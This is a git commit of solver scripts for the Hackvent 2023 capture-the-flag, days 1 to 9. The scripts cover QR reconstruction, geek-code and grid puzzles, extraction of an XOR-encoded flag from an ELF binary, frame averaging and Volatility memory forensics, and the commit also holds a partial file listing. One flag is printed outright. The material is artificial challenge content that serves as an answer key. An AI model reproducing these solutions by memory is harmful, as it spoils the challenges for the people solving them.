commit 697849f63ebcee33d8a8f91f06d02cfc4cd4025b Author: Roman Hergenreder Date: Mon Dec 18 16:02:49 2023 +0100 Initial Commit Day 1-9 diff --git a/Day 1/a-letter-from-santa.zip b/Day 1/a-letter-from-santa.zip new file mode 100644 index 0000000..5919a6e Binary files /dev/null and b/Day 1/a-letter-from-santa.zip differ diff --git a/Day 1/decode.py b/Day 1/decode.py new file mode 100644 index 0000000..0e94fe9 --- /dev/null +++ b/Day 1/decode.py @@ -0,0 +1,32 @@ +import string +from bs4 import BeautifulSoup +from PIL import Image +from pyzbar.pyzbar import decode + +qr_size = 25 +pix_size = 10 +img_size = pix_size * qr_size + +with open("templates/santa.j2", "r") as f: + soup = BeautifulSoup(f.read(), "html.parser") + img = Image.new("RGB", (img_size, img_size), "white") + y = 0 + + for c in string.ascii_lowercase: + bin_str = "" + x = 0 + for e in soup.find_all("span"): + if e.text.strip() == "{{" + c + "}}": + if "a" in e["class"]: + color = (0, 0, 0) + else: + color = (255, 255, 255) + + for xi in range(x, x+pix_size): + for yi in range(y, y+pix_size): + img.putpixel((xi, yi), color) + + x += pix_size + y += pix_size + + print("[+] Flag:", decode(img)[0].data.decode()) \ No newline at end of file diff --git a/Day 1/templates/santa.j2 b/Day 1/templates/santa.j2 new file mode 100644 index 0000000..50320cf --- /dev/null +++ b/Day 1/templates/santa.j2 @@ -0,0 +1,2 @@ + +{{f}}{{b}}{{a}}{{x}}{{m}}{{y}}{{p}}{{w}}{{d}}{{j}}{{e}}{{q}}{{l}}{{c}}{{h}}{{v}}{{i}}{{s}}{{n}}{{u}}{{r}}{{k}}{{o}}{{t}}{{g}}{{f}}{{k}}{{u}}{{s}}{{b}}{{l}}{{w}}{{x}}{{a}}{{i}}{{m}}{{t}}{{e}}{{c}}{{j}}{{n}}{{q}}{{h}}{{o}}{{r}}{{y}}{{g}}{{v}}{{p}}{{d}}{{w}}{{u}}{{x}}{{c}}{{o}}{{g}}{{n}}{{r}}{{i}}{{d}}{{h}}{{p}}{{b}}{{f}}{{e}}{{s}}{{y}}{{q}}{{l}}{{j}}{{m}}{{t}}{{v}}{{k}}{{a}}{{s}}{{p}}{{x}}{{d}}{{i}}{{t}}{{f}}{{c}}{{n}}{{j}}{{v}}{{g}}{{l}}{{h}}{{b}}{{m}}{{e}}{{r}}{{w}}{{a}}{{u}}{{k}}{{o}}{{q}}{{y}}{{e}}{{v}}{{x}}{{f}}{{y}}{{n}}{{i}}{{k}}{{m}}{{a}}{{w}}{{c}}{{g}}{{b}}{{j}}{{h}}{{q}}{{t}}{{d}}{{l}}{{p}}{{s}}{{r}}{{u}}{{o}}{{d}}{{p}}{{t}}{{l}}{{f}}{{j}}{{h}}{{c}}{{s}}{{g}}{{o}}{{y}}{{n}}{{q}}{{a}}{{w}}{{m}}{{v}}{{u}}{{b}}{{e}}{{x}}{{k}}{{i}}{{r}}{{k}}{{r}}{{e}}{{q}}{{o}}{{m}}{{n}}{{v}}{{h}}{{i}}{{y}}{{c}}{{g}}{{w}}{{a}}{{s}}{{l}}{{b}}{{t}}{{d}}{{u}}{{f}}{{x}}{{p}}{{j}}{{o}}{{y}}{{r}}{{i}}{{h}}{{l}}{{x}}{{u}}{{t}}{{s}}{{q}}{{c}}{{b}}{{n}}{{m}}{{f}}{{g}}{{v}}{{d}}{{p}}{{j}}{{a}}{{e}}{{k}}{{w}}{{k}}{{s}}{{t}}{{h}}{{j}}{{q}}{{a}}{{l}}{{m}}{{c}}{{n}}{{w}}{{e}}{{u}}{{i}}{{p}}{{v}}{{d}}{{g}}{{x}}{{y}}{{o}}{{r}}{{f}}{{b}}{{o}}{{d}}{{l}}{{y}}{{x}}{{t}}{{c}}{{b}}{{n}}{{a}}{{f}}{{p}}{{r}}{{q}}{{e}}{{w}}{{v}}{{h}}{{i}}{{g}}{{j}}{{k}}{{m}}{{s}}{{u}}{{e}}{{c}}{{f}}{{m}}{{k}}{{b}}{{j}}{{s}}{{u}}{{a}}{{v}}{{g}}{{t}}{{q}}{{n}}{{l}}{{d}}{{x}}{{y}}{{h}}{{w}}{{o}}{{p}}{{i}}{{r}}{{e}}{{u}}{{i}}{{w}}{{g}}{{o}}{{n}}{{q}}{{l}}{{y}}{{h}}{{m}}{{a}}{{x}}{{d}}{{b}}{{c}}{{v}}{{t}}{{r}}{{k}}{{s}}{{j}}{{p}}{{f}}{{e}}{{r}}{{l}}{{b}}{{g}}{{t}}{{u}}{{w}}{{d}}{{n}}{{o}}{{i}}{{v}}{{c}}{{p}}{{q}}{{s}}{{h}}{{f}}{{y}}{{a}}{{m}}{{k}}{{x}}{{j}}{{p}}{{f}}{{o}}{{d}}{{m}}{{q}}{{i}}{{w}}{{s}}{{a}}{{h}}{{x}}{{r}}{{j}}{{l}}{{v}}{{g}}{{n}}{{k}}{{e}}{{y}}{{c}}{{b}}{{u}}{{t}}{{c}}{{d}}{{f}}{{s}}{{j}}{{a}}{{h}}{{l}}{{r}}{{q}}{{k}}{{v}}{{m}}{{i}}{{u}}{{e}}{{b}}{{t}}{{g}}{{n}}{{p}}{{y}}{{w}}{{x}}{{o}}{{m}}{{q}}{{o}}{{p}}{{v}}{{h}}{{y}}{{f}}{{t}}{{w}}{{e}}{{c}}{{s}}{{a}}{{j}}{{n}}{{x}}{{u}}{{b}}{{d}}{{r}}{{g}}{{k}}{{l}}{{i}}{{w}}{{s}}{{y}}{{i}}{{l}}{{x}}{{t}}{{v}}{{k}}{{f}}{{e}}{{d}}{{p}}{{c}}{{n}}{{u}}{{r}}{{m}}{{h}}{{j}}{{o}}{{b}}{{q}}{{a}}{{g}}{{f}}{{n}}{{b}}{{t}}{{j}}{{h}}{{y}}{{w}}{{a}}{{i}}{{d}}{{v}}{{r}}{{m}}{{k}}{{p}}{{l}}{{c}}{{g}}{{x}}{{s}}{{u}}{{q}}{{e}}{{o}}{{o}}{{f}}{{u}}{{q}}{{j}}{{w}}{{n}}{{h}}{{x}}{{a}}{{k}}{{y}}{{v}}{{i}}{{g}}{{p}}{{s}}{{m}}{{l}}{{c}}{{d}}{{e}}{{b}}{{r}}{{t}}{{a}}{{e}}{{t}}{{g}}{{b}}{{d}}{{u}}{{x}}{{l}}{{h}}{{s}}{{j}}{{p}}{{v}}{{w}}{{i}}{{r}}{{o}}{{k}}{{m}}{{n}}{{y}}{{f}}{{q}}{{c}}{{v}}{{j}}{{i}}{{w}}{{g}}{{b}}{{s}}{{d}}{{m}}{{y}}{{l}}{{p}}{{x}}{{o}}{{e}}{{u}}{{q}}{{t}}{{r}}{{c}}{{a}}{{n}}{{f}}{{h}}{{k}}{{y}}{{c}}{{l}}{{m}}{{f}}{{p}}{{j}}{{r}}{{w}}{{n}}{{e}}{{b}}{{k}}{{t}}{{g}}{{i}}{{v}}{{x}}{{o}}{{s}}{{q}}{{u}}{{d}}{{a}}{{h}}{{v}}{{p}}{{d}}{{y}}{{s}}{{o}}{{i}}{{f}}{{j}}{{g}}{{a}}{{n}}{{x}}{{t}}{{w}}{{c}}{{u}}{{e}}{{r}}{{b}}{{k}}{{q}}{{m}}{{h}}{{l}}{{t}}{{j}}{{r}}{{v}}{{m}}{{x}}{{y}}{{d}}{{q}}{{i}}{{l}}{{w}}{{g}}{{p}}{{n}}{{u}}{{h}}{{o}}{{e}}{{b}}{{c}}{{f}}{{s}}{{a}}{{k}}{{u}}{{x}}{{p}}{{e}}{{j}}{{g}}{{y}}{{h}}{{k}}{{v}}{{b}}{{d}}{{i}}{{s}}{{c}}{{r}}{{a}}{{q}}{{n}}{{o}}{{w}}{{t}}{{l}}{{m}}{{f}} \ No newline at end of file diff --git a/Day 2/decode.py b/Day 2/decode.py new file mode 100644 index 0000000..95863d8 --- /dev/null +++ b/Day 2/decode.py @@ -0,0 +1,3 @@ +data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++" +# "PGP++++" -> Philip Zimmerman +print("[+] Flag: HV23{Philip Zimmerman}") \ No newline at end of file diff --git a/Day 3/decode.py b/Day 3/decode.py new file mode 100644 index 0000000..df29e1e --- /dev/null +++ b/Day 3/decode.py @@ -0,0 +1,58 @@ +data = [ + ["8","c","t","k","3"], + ["2","r","H","V","r"], + ["2","y",None,"0","v"], + ["2","e","n","3","_"], + ["}","3","h","{","m"], +] + +def find_char(c, min=(0, 0)): + for x, row in enumerate(data): + for y, v in enumerate(row): + if v == c and (x, y) >= min: + return (x, y) + + +def find_key(cirb="HV23{"): + min = (0, 0) + key = [] + for c in cirb: + key.append(find_char(c, min)) + min = key[-1] + key[3] = (4, 1) # or (3, 3) + key.append(rotate(find_char('}'), 3)) # for final '}' + return key + +def rotate(key, rotation): + rotation = rotation % 4 + if rotation == 0: + return key + + n = len(data) - 1 + rotated = [] + + if isinstance(key, list): + for (x, y) in key: + rotated.append((y, n - x)) + else: + rotated = (key[1], n - key[0]) + + if rotation > 1: + return rotate(rotated, rotation - 1) + + return rotated + +def get_text(key, rotation=0): + text = "" + key = list(sorted(rotate(key, rotation))) + for (x, y) in key: + text += data[x][y] + return text + +key = find_key() + +flag = "" +for i in range(0, 4): + flag += get_text(key, -i) + +print("[+] Flag:", flag) \ No newline at end of file diff --git a/Day 4/bowser.elf b/Day 4/bowser.elf new file mode 100755 index 0000000..49333bc Binary files /dev/null and b/Day 4/bowser.elf differ diff --git a/Day 4/decode.py b/Day 4/decode.py new file mode 100644 index 0000000..46b1b7e --- /dev/null +++ b/Day 4/decode.py @@ -0,0 +1,26 @@ +from hackingscripts import util +from pwn import context, disasm +import re + +if __name__ == "__main__": + with open("bowser.elf", "rb") as f: + elf = f.read() + + context.arch = "amd64" + offset = 0x1332 + flag = b"" + + for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"): + match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr) + if match: + flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF) + else: + match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr) + if match: + flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF) + elif re.match(r"call\s+.*", instr): + break + + flag = flag.split(b"\x00")[1].decode() + print("[+] Flag:", flag) + diff --git a/Day 5/aurora.mp4 b/Day 5/aurora.mp4 new file mode 100644 index 0000000..a6749dc Binary files /dev/null and b/Day 5/aurora.mp4 differ diff --git a/Day 5/decode.py b/Day 5/decode.py new file mode 100644 index 0000000..e0a8342 --- /dev/null +++ b/Day 5/decode.py @@ -0,0 +1,47 @@ +from PIL import Image +import os +import sys +import operator +import subprocess +import shutil + +def extract_frames(destination): + os.makedirs(destination, exist_ok=True) + subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"]) + print() + +def parse_frame(file): + img = Image.open(file) + pix = img.load() + return img.size, pix + +if __name__ == "__main__": + + output_directory = "frames" + pixel_sum = None + count = 0 + + extract_frames(output_directory) + for file in sorted(os.listdir(output_directory)): + if file.endswith(".png"): + sys.stdout.write(f"\rAnalyzing: {file}") + (width, height), pix = parse_frame(os.path.join(output_directory, file)) + if pixel_sum is None: + pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)] + + for x in range(width): + for y in range(height): + pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y])) + + count += 1 + + print("\nComposing new image") + img = Image.new("RGB", (width, height)) + pix = img.load() + + for x in range(width): + for y in range(height): + pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3)) + + img.save(f"result.png") + shutil.rmtree(output_directory) \ No newline at end of file diff --git a/Day 5/result.png b/Day 5/result.png new file mode 100644 index 0000000..a2332fd Binary files /dev/null and b/Day 5/result.png differ diff --git a/Day 6/.gitattributes b/Day 6/.gitattributes new file mode 100644 index 0000000..dbdcaab --- /dev/null +++ b/Day 6/.gitattributes @@ -0,0 +1 @@ +memory.raw filter=lfs diff=lfs merge=lfs -text diff --git a/Day 6/cool-santa-claus.jpg b/Day 6/cool-santa-claus.jpg new file mode 100644 index 0000000..54c2a32 Binary files /dev/null and b/Day 6/cool-santa-claus.jpg differ diff --git a/Day 6/extract.sh b/Day 6/extract.sh new file mode 100644 index 0000000..9779add --- /dev/null +++ b/Day 6/extract.sh @@ -0,0 +1,3 @@ +vol -f memory.raw windows.info +vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg" +vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0 diff --git a/Day 6/files.txt b/Day 6/files.txt new file mode 100755 index 0000000..2dc3f12 --- /dev/null +++ b/Day 6/files.txt @@ -0,0 +1,4480 @@ +Volatility 3 Framework 2.4.1 + +Offset Name Size + +0x918b7008ec20 \Windows\System32\drivers\mpsdrv.sys 216 +0x918b700970c0 \Sessions\1\AppContainerNamedObjects 216 +0x918b70097a20 \Windows\System32\TextInputFramework.dll 216 +0x918b706b03e0 \Windows 216 +0x918b709830a0 \$Secure:$SII:$INDEX_ALLOCATION 216 +0x918b70983210 \:$I30:$INDEX_ALLOCATION 216 +0x918b70983940 \$Directory 216 +0x918b70983c20 \$Mft 216 +0x918b70984070 \$BitMap 216 +0x918b709841e0 \$MftMirr 216 +0x918b709847a0 \$LogFile 216 +0x918b70984910 \$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000002 216 +0x918b70984a80 \$Mft::$BITMAP 216 +0x918b70984d60 \$Secure:$SDS:$DATA 216 +0x918b70a03380 \Windows\System32\vertdll.dll 216 +0x918b70a034f0 \$Extend\$RmMetadata\$TxfLog\$TxfLog.blf 216 +0x918b70a03d90 \$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 216 +0x918b70a041e0 \$Extend\$RmMetadata\$Repair:$Verify:$DATA 216 +0x918b70a04350 \$Extend:$I30:$INDEX_ALLOCATION 216 +0x918b70a044c0 \$Extend\$RmMetadata\$Repair:$Corrupt:$DATA 216 +0x918b70a04630 \$Extend\$Deleted:$I30:$INDEX_ALLOCATION 216 +0x918b70a047a0 \$Extend\$UsnJrnl:$J:$DATA 216 +0x918b70a04910 \$Extend\$RmMetadata\$Repair 216 +0x918b70a04a80 \Device\HarddiskVolume4\$Extend\$RmMetadata\$TxfLog\$TxfLog 216 +0x918b70a04bf0 \$Directory 216 +0x918b70a620a0 \$Directory 216 +0x918b70a62210 \$Extend\$RmMetadata\$Txf:$I30:$INDEX_ALLOCATION 216 +0x918b70a62380 \Windows\System32\drivers\vmusbmouse.sys 216 +0x918b70a624f0 \$NonCachedIo 216 +0x918b70a62c20 \Windows\System32\drivers\dumpfve.sys 216 +0x918b70a63350 \$Extend\$RmMetadata\$TxfLog\$Tops:$T:$DATA 216 +0x918b70a634c0 \$Extend\$RmMetadata\$TxfLog\$Tops 216 +0x918b70a63630 \:$I30:$INDEX_ALLOCATION 216 +0x918b70a637a0 \Device\HarddiskVolume4\$Extend\$RmMetadata\$TxfLog\$TxfLog 216 +0x918b70a63910 \Device\HarddiskVolume4\$Extend\$RmMetadata\$TxfLog\$TxfLog 216 +0x918b70a63a80 TxfLog 216 +0x918b70a63bf0 KtmLog 216 +0x918b70a63ed0 \$Extend\$Reparse:$R:$INDEX_ALLOCATION 216 +0x918b70a6d210 \Windows\System32\ntdll.dll 216 +0x918b70a6d380 \Windows\SysWOW64\ntdll.dll 216 +0x918b70a6d4f0 \$Directory 216 +0x918b70a6d7d0 \Windows\System32\drivers\cdrom.sys 216 +0x918b70a6dd90 \$Directory 216 +0x918b70a6e070 \$Directory 216 +0x918b70a6e1e0 \Windows\System32\drivers\lsi_sas.sys 216 +0x918b70a6e4c0 \$Directory 216 +0x918b70a6e630 \$Directory 216 +0x918b70a6e910 \Windows\System32\drivers\Diskdump.sys 216 +0x918b70a6ea80 \Windows\System32\drivers\crashdmp.sys 216 +0x918b70a91220 \Windows\System32\drivers\dxgkrnl.sys 216 +0x918b70a917e0 \Windows\System32\drivers\filecrypt.sys 216 +0x918b70a91ac0 \Windows\System32\drivers\watchdog.sys 216 +0x918b70a927b0 \Windows\System32\drivers\null.sys 216 +0x918b70a92d70 \Windows\System32\drivers\hidusb.sys 216 +0x918b70a93330 \Windows\System32\drivers\hidclass.sys 216 +0x918b70a93780 \$Directory 216 +0x918b70a93a60 \Windows\System32\drivers\hidparse.sys 216 +0x918b70a93bd0 \Windows\System32\drivers\tbs.sys 216 +0x918b70a93d40 \Windows\System32\drivers\beep.sys 216 +0x918b70a94470 \Windows\System32\DriverStore\FileRepository\basicdisplay.inf_amd64_25ab9510fd18cfda\BasicDisplay.sys 216 +0x918b70a945e0 \$Directory 216 +0x918b70a94a30 \Windows\System32\drivers\mouhid.sys 216 +0x918b70a94ba0 \Windows\System32\drivers\mouclass.sys 216 +0x918b70a94d10 \Windows\System32\drivers\Vid.sys 216 +0x918b70f065c0 \Windows\System32\drivers\monitor.sys 216 +0x918b70fd7390 \Windows\System32\DriverStore\FileRepository\umbus.inf_amd64_0a69be6a385b49f7\umbus.sys 216 +0x918b70fd77e0 \Windows\System32\drivers\battc.sys 216 +0x918b70fd7950 \Windows\System32\drivers\kdnic.sys 216 +0x918b70fd7da0 \Windows\System32\drivers\intelppm.sys 216 +0x918b70fd8080 \Windows\System32\drivers\e1i65x64.sys 216 +0x918b70fd84d0 \Windows\System32\drivers\kbdclass.sys 216 +0x918b70fd8640 \Windows\System32\drivers\vmmouse.sys 216 +0x918b70fd87b0 \Windows\System32\drivers\winhvr.sys 216 +0x918b70fd8d70 \Windows\System32\drivers\i8042prt.sys 216 +0x918b70fd8ee0 \Windows\System32\drivers\vm3dmp.sys 216 +0x918b70fd9330 \Windows\System32\drivers\vm3dmp_loader.sys 216 +0x918b70fd98f0 \Windows\System32\drivers\vmgencounter.sys 216 +0x918b70fd9bd0 \Windows\System32\DriverStore\FileRepository\compositebus.inf_amd64_160f98ccef202f85\CompositeBus.sys 216 +0x918b70fd9d40 \Windows\System32\drivers\CmBatt.sys 216 +0x918b70fda190 \Windows\System32\DriverStore\FileRepository\basicrender.inf_amd64_9ff437f462543a42\BasicRender.sys 216 +0x918b70fda470 \Windows\System32\drivers\NdisVirtualBus.sys 216 +0x918b70fdaa30 \Windows\System32\drivers\mssmbios.sys 216 +0x918b70fdad10 \Windows\System32\DriverStore\FileRepository\swenum.inf_amd64_9ebb9a8726114d22\swenum.sys 216 +0x918b740020b0 \Windows\System32\drivers\afunix.sys 216 +0x918b74002950 \Windows\System32\drivers\rdpbus.sys 216 +0x918b74002c30 \Windows\System32\drivers\afd.sys 216 +0x918b740031f0 \Windows\System32\drivers\vwififlt.sys 216 +0x918b740034d0 \Windows\System32\drivers\ws2ifsl.sys 216 +0x918b74003920 \Windows\System32\drivers\npfs.sys 216 +0x918b74003c00 \Windows\System32\drivers\tdi.sys 216 +0x918b74003d70 \Windows\System32\drivers\netbt.sys 216 +0x918b74003ee0 \Windows\System32\drivers\ks.sys 216 +0x918b740041c0 \Windows\System32\drivers\msfs.sys 216 +0x918b74004bd0 \Windows\System32\drivers\tdx.sys 216 +0x918b74004eb0 \Windows\System32\drivers\pacer.sys 216 +0x918b740055e0 \Windows\System32\drivers\netbios.sys 216 +0x918b74005750 \Windows\System32\drivers\rdbss.sys 216 +0x918b74005d10 \Windows\System32\drivers\nsiproxy.sys 216 +0x918b740cd220 \Windows\System32\smss.exe 216 +0x918b740cd500 \Windows\System32\drivers\gpuenergydrv.sys 216 +0x918b740ce1f0 \Windows\System32\drivers\dfsc.sys 216 +0x918b740ce7b0 \Windows\System32\drivers\fastfat.sys 216 +0x918b740ceee0 \Windows\System32\drivers\npsvctrig.sys 216 +0x918b740cf330 \Windows\System32\drivers\bam.sys 216 +0x918b740cf610 \Windows\System32\drivers\ahcache.sys 216 +0x918b740d0e80 \$Directory 216 +0x918b740d73e0 \Windows\System32\msvcrt.dll 216 +0x918b740d7700 \Windows\System32\shell32.dll 216 +0x918b740d7890 \Windows\System32\advapi32.dll 216 +0x918b740d7a20 \Windows\System32\SHCore.dll 216 +0x918b740d7bb0 \Windows\System32\wow64win.dll 216 +0x918b740d7d40 \Windows\System32\wow64cpu.dll 216 +0x918b740d7ed0 \Windows\System32\normaliz.dll 216 +0x918b740d81f0 \Windows\System32\gdi32.dll 216 +0x918b740d8510 \Windows\System32\comdlg32.dll 216 +0x918b740d86a0 \Windows\System32\oleaut32.dll 216 +0x918b740d8830 \Windows\System32\ws2_32.dll 216 +0x918b740d89c0 \Windows\System32\nsi.dll 216 +0x918b740d8b50 \Windows\System32\wow64.dll 216 +0x918b740d8ce0 \Windows\System32\difxapi.dll 216 +0x918b740d8e70 \Windows\System32\setupapi.dll 216 +0x918b740f7510 \$Directory 216 +0x918b740f7680 \$Directory 216 +0x918b740f84e0 \$Directory 216 +0x918b740f8d80 \$Directory 216 +0x918b742f1250 \Windows\System32\cfgmgr32.dll 216 +0x918b742f13e0 \Windows\System32\msctf.dll 216 +0x918b742f1570 \Windows\System32\psapi.dll 216 +0x918b742f1700 \Windows\System32\ole32.dll 216 +0x918b742f1890 \Windows\System32\GdiPlus.dll 216 +0x918b742f1a20 \Windows\System32\imagehlp.dll 216 +0x918b742f1bb0 \Windows\System32\rpcrt4.dll 216 +0x918b742f1d40 \Windows\System32\Wldap32.dll 216 +0x918b742f1ed0 \Windows\System32\clbcatq.dll 216 +0x918b742f21f0 \Windows\System32\coml2.dll 216 +0x918b742f2380 \Windows\System32\imm32.dll 216 +0x918b742f2510 \Windows\System32\KernelBase.dll 216 +0x918b742f26a0 \Windows\System32\win32u.dll 216 +0x918b742f2830 \Windows\System32\kernel32.dll 216 +0x918b742f29c0 \Windows\System32\combase.dll 216 +0x918b742f2ce0 \Windows\System32\windows.storage.dll 216 +0x918b742f2e70 \Windows\System32\bcryptprimitives.dll 216 +0x918b7433a0c0 \Windows\SysWOW64\msasn1.dll 216 +0x918b7433a250 \Windows\SysWOW64\setupapi.dll 216 +0x918b7433a3e0 \Windows\System32\comctl32.dll 216 +0x918b7433a570 \Windows\System32\wintrust.dll 216 +0x918b7433a700 \Windows\System32\ucrtbase.dll 216 +0x918b7433a890 \Windows\System32\crypt32.dll 216 +0x918b7433aa20 \Windows\System32\msasn1.dll 216 +0x918b7433abb0 \Windows\System32\profapi.dll 216 +0x918b7433ad40 \Windows\System32\bcrypt.dll 216 +0x918b7433aed0 \Windows\SysWOW64\difxapi.dll 216 +0x918b7433b1f0 \Windows\SysWOW64\coml2.dll 216 +0x918b7433b380 \Windows\System32\powrprof.dll 216 +0x918b7433b510 \Windows\System32\umpdc.dll 216 +0x918b7433b6a0 \Windows\SysWOW64\powrprof.dll 216 +0x918b7433b830 \Windows\SysWOW64\msvcrt.dll 216 +0x918b7433b9c0 \Windows\SysWOW64\comdlg32.dll 216 +0x918b7433b9f0 멈琳醋￿멈琳醋￿ 0 +0x918b7433bb50 \Windows\System32\cryptsp.dll 216 +0x918b7433bce0 \Windows\System32\gdi32full.dll 216 +0x918b7433be70 \Windows\System32\kernel.appcore.dll 216 +0x918b74343250 \Windows\SysWOW64\wintrust.dll 216 +0x918b743433e0 \Windows\SysWOW64\shlwapi.dll 216 +0x918b74343570 \Windows\SysWOW64\GdiPlus.dll 216 +0x918b74343700 \Windows\SysWOW64\kernel.appcore.dll 216 +0x918b74343890 \Windows\SysWOW64\cryptsp.dll 216 +0x918b74343a20 \Windows\SysWOW64\windows.storage.dll 216 +0x918b74343bb0 \Windows\SysWOW64\oleaut32.dll 216 +0x918b74343d40 \Windows\SysWOW64\normaliz.dll 216 +0x918b74343ed0 \Windows\SysWOW64\ucrtbase.dll 216 +0x918b743441f0 \Windows\SysWOW64\umpdc.dll 216 +0x918b74344380 \Windows\SysWOW64\msvcp_win.dll 216 +0x918b74344510 \Windows\SysWOW64\win32u.dll 216 +0x918b743446a0 \Windows\SysWOW64\imagehlp.dll 216 +0x918b74344830 \Windows\SysWOW64\cfgmgr32.dll 216 +0x918b743449c0 \Windows\SysWOW64\SHCore.dll 216 +0x918b74344b50 \Windows\SysWOW64\kernel32.dll 216 +0x918b74344ce0 \Windows\SysWOW64\gdi32full.dll 216 +0x918b7436a260 \Windows\System32\sxssrv.dll 216 +0x918b7436a3f0 \Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\vcruntime140_app.dll 216 +0x918b7436a580 \Windows\System32\dbghelp.dll 216 +0x918b7436a710 \Sessions\0\AppContainerNamedObjects 216 +0x918b7436a8a0 \Windows\System32\en-US\win32kbase.sys.mui 216 +0x918b7436aa30 \Windows\System32\win32kfull.sys 216 +0x918b7436abc0 \$Directory 216 +0x918b7436ad50 \Windows\System32\win32kbase.sys 216 +0x918b7436aee0 \Windows\System32\winsrv.dll 216 +0x918b7436b200 \Windows\System32\csrss.exe 216 +0x918b7436b390 \Windows\System32\csrsrv.dll 216 +0x918b7436b520 \Windows\System32 216 +0x918b7436b6b0 \Windows\System32\en-US\csrss.exe.mui 216 +0x918b7436b9d0 \CMApi 216 +0x918b7436bcf0 \Windows\System32\basesrv.dll 216 +0x918b7436be80 \Windows\System32\en-US\winsrv.dll.mui 216 +0x918b7436c1a0 \Windows\System32\locale.nls 216 +0x918b7436c330 \Windows\System32\winsrvext.dll 216 +0x918b7436c4c0 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b7436c650 \Windows\System32\drivers\dxgmms2.sys 216 +0x918b7436c970 \$Directory 216 +0x918b7436cb00 \$Directory 216 +0x918b7436ce20 \Windows\System32\wininit.exe 216 +0x918b7436d140 \Windows\System32\csrss.exe 216 +0x918b7436d2d0 \Windows\System32 216 +0x918b7436d460 \Windows\System32\sspicli.dll 216 +0x918b7436d780 \$Directory 216 +0x918b7436d910 \Windows\System32 216 +0x918b7436daa0 \Windows\System32\wininitext.dll 216 +0x918b7436dc30 \Windows\System32\userenv.dll 216 +0x918b743710d0 \EFI\Microsoft\Boot\BCD.LOG 216 +0x918b74371260 \ProtectedPrefix 216 +0x918b743713f0 \ProtectedPrefix\LocalService 216 +0x918b74371580 \Windows\System32\config\SYSTEM 216 +0x918b74371710 \Sessions 216 +0x918b743718a0 \ProtectedPrefix\LocalService 216 +0x918b74371a30 \Windows\System32\config\SYSTEM.LOG2 216 +0x918b74371bc0 \Windows\System32\config\SECURITY 216 +0x918b74371d50 \Windows\System32\config\SECURITY.LOG2 216 +0x918b74371ee0 \Windows\SysWOW64\sspicli.dll 216 +0x918b74372200 \ProtectedPrefix\Administrators 216 +0x918b74372390 \Windows\SysWOW64\cryptbase.dll 216 +0x918b743726b0 \$Directory 216 +0x918b74372840 \Windows\System32\config\SYSTEM.LOG1 216 +0x918b743729d0 \Windows\SysWOW64\iertutil.dll 216 +0x918b74372b60 \Windows\System32\config\SECURITY.LOG1 216 +0x918b74372cf0 \Windows\bootstat.dat 216 +0x918b74372e80 \Windows\System32\config\SOFTWARE.LOG1 216 +0x918b743734c0 \Windows\System32\config\DEFAULT 216 +0x918b74373650 \EFI\Microsoft\Boot\BCD 216 +0x918b743737e0 \ProtectedPrefix\NetWorkService 216 +0x918b74373970 \ProtectedPrefix\NetWorkService 216 +0x918b74373b00 \Windows\System32\config\SOFTWARE 216 +0x918b74373c90 \Windows\System32\config\SOFTWARE.LOG2 216 +0x918b74373e20 \ProtectedPrefix\Administrators 216 +0x918b74374140 \ProtectedPrefix 216 +0x918b743742d0 \Windows\System32\config\SAM 216 +0x918b743745f0 \Windows\System32\config\DEFAULT.LOG1 216 +0x918b74374780 \Windows\System32\win32k.sys 216 +0x918b74374910 :$VMCB$ 216 +0x918b74374aa0 \Windows\System32\config\SAM.LOG1 216 +0x918b74374c30 \Windows\System32\config\DEFAULT.LOG2 216 +0x918b74374dc0 \Windows\System32\config\SAM.LOG2 216 +0x918b7438d370 \$Mft 216 +0x918b7438d7c0 \$MftMirr 216 +0x918b7438eec0 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventlog-Security.etl 216 +0x918b7438f1a0 \$Secure:$SII:$INDEX_ALLOCATION 216 +0x918b7438f5f0 \$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 216 +0x918b7438f760 \$BitMap 216 +0x918b7438f8d0 \$Extend\$RmMetadata\$Repair 216 +0x918b7438fa40 \$Extend\$RmMetadata\$TxfLog\$TxfLog.blf 216 +0x918b743905c0 \$Extend\$RmMetadata\$TxfLog\$Tops 216 +0x918b74390730 \Device\HarddiskVolume1\$Extend\$RmMetadata\$TxfLog\$TxfLog 216 +0x918b743908a0 \$Extend:$I30:$INDEX_ALLOCATION 216 +0x918b74390b80 \$Extend\$Deleted:$I30:$INDEX_ALLOCATION 216 +0x918b74390cf0 \$Secure:$SDS:$DATA 216 +0x918b743912b0 \$LogFile 216 +0x918b74391420 \$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000002 216 +0x918b74391590 \Device\HarddiskVolume1\$Extend\$RmMetadata\$TxfLog\$TxfLog 216 +0x918b74391870 \$Mft::$BITMAP 216 +0x918b743919e0 \:$I30:$INDEX_ALLOCATION 216 +0x918b74391e30 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl 216 +0x918b74392110 \$Directory 216 +0x918b74392280 \$Secure:$SDH:$INDEX_ALLOCATION 216 +0x918b743923f0 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl 216 +0x918b74392560 \$Directory 216 +0x918b74392840 \Windows\System32\LogFiles\WMI\LwtNetLog.etl 216 +0x918b743929b0 \Windows\System32\LogFiles\WMI\NetCore.etl 216 +0x918b74392b20 \Windows\System32\LogFiles\WMI\RadioMgr.etl 216 +0x918b743930e0 \$Directory 216 